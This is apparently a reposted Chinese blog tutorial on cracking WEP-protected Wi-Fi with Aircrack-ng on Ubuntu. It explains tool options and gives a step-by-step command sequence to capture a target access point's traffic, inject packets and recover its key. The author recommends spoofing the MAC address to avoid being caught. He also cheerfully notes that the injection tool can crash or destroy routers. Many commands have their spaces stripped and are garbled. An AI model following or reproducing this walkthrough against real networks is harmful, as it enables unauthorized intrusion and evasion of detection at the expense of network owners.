无线破解 -->无线还安全吗?

来源:互联网 发布:苹果手机电池测试软件 编辑:程序博客网 时间:2024/04/29 16:30

由于在Windows环境下不能如Linux环境下直接调用无线网卡,所以需要使用其他工具将无线网卡载入,以便攻击工具能够正常使用,在无线攻击套装Aircrack-ng的Windows版本下内置这样的工具,就是Aircrack-ng,下面给大家介绍一下在Ubuntu下Aircrack-ng工具包的使用。

 

安装:$sudoapt-getinstallaircrack-ng

Aircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:

airmon-ng处理网卡工作模式

airodump-ng抓包

aircrack-ng破解

aireplay-ng发包,干扰

1)airmon-ng

启动无线网卡进入Monitor模式,

useage:airmon-ng<start|stop|check><interface>[channel]

<start|stop|check>:启动,停止,检测

<interface>:指定无线网卡

[channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了

2)airodump-ng

抓包工具,我最喜欢用的,详细用法如下:

usage:airodump-ng<options><interface>[,<interface>,...]

Options:

–ivs:仅将抓取信息保存为.ivs

–write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

–beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的

Filteroptions:

–encrypt<suite>:使用密码序列过滤AP

–netmask<netmask>:使用掩码过滤AP

–bssid<bssid>:使用bssid过滤AP

-a:过滤无关的客户端

–help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

3)aireplay-ng

搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

usage:aireplay-ng<options><replayinterface>

Filteroptions:

-bbssid:AP的MAC

-ddmac:目标的MAC

-ssmac:来源的MAC

-mlen:最小包长度

-nlen:最大包长度

-D:禁用AP发现功能

Replayoptions:

-xnbpps:每秒包数量

-pfctrl:框架设定(hex)

-abssid:设置AP的mac

-cdmac:设置目标的MAC

-hsmac:设置来源的mac

-gvalue:改变环缓存大小(默认8)

Fakeauthattackoptions:

-eessid:设置目标AP的SSID

-onpckts:每秒爆破的包数量(0自动,默认1)

-qsec:存活时间秒

-yprga:共享可信的key流

–help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.

4)aircrack-ng

破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

usage:aircrack-ng[options]<.cap/.ivsfile(s)>

Commonoptions:

-a<amode>:暴破(1/WEP,2/WPA-PSK)

-e<essid>:选择essid为目标

-b<bssid>:选择ap的mac为目标,就是破解识别的关键字

-q:使用安静模式,无数出模式

-C<macs>:将所有的AP合并为一个虚拟的

–help:显示这个帮助

就WEP破解说明,步骤:

步骤:

1.修改无线网卡状态:先down掉

2.伪造无线网卡的MAC地址:安全起见,减少被抓到的可能

3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡

4.修改无线网卡状态:up

5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标

6.监听抓包:生成.cap或.ivs

7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包

8.破解.cap或.ivs,获得WEP密码,完成破解

具体步骤:

1、首先确定是否有wlan0的无线网卡端口,ifconfig即可知道。若存在终端输入sudoairmon-ngstartwlan0启动无线网卡的监控模式。

 

2、在终端中输入sudoairodump-ngmon0,启动监控模式后无线端口是mon0(如果启动多次会按数字累加),看看有哪些采用wep加密的AP在线,然后按ctrl+c退出,保留终端。

3、另开一个终端,输入sudoairodump-ng-c6--bssidAP'sMAC-wwepmon0(-c后面的6为AP工作频道,--bissid后面的AP'sMAC是要欲破解AP的MAC地址,-w后的wep的是抓下来的数据包DATA保存的文件名(可以随便取名),然后回车开始抓包。

4、再另开一个终端,输入sudoaireplay-ng-10-eESSID-aAP'sMAC-hMyMACmon0与AP建立虚拟连接(-h后面跟着的MyMAC是自己的无线网卡的MAC地址)

这里以之前探测到的ESSID为P2P的为例。

5、建立虚拟连接成功后,输入sudoaireplay-ng-2-F-p0841-cff:ff:ff:ff:ff:ff-bAP'sMAC-hMyMACmon0进行注入,现在步骤3中数据包应该不断增长。

 

6、收集有5000个以上的DATA之后,另开一个终端,输入sudoaircrack-ngwep*.cap进行解密(如果没算出来的话,继续等,Ubuntuaircrack-ng会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)

7、破解出密码后在终端中输入sudoairmon-ngstopmon0关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的,除非重新启动电脑。

8、如果没有出现意外,你应该会很高兴的看到KEYFOUND!

 

原创粉丝点击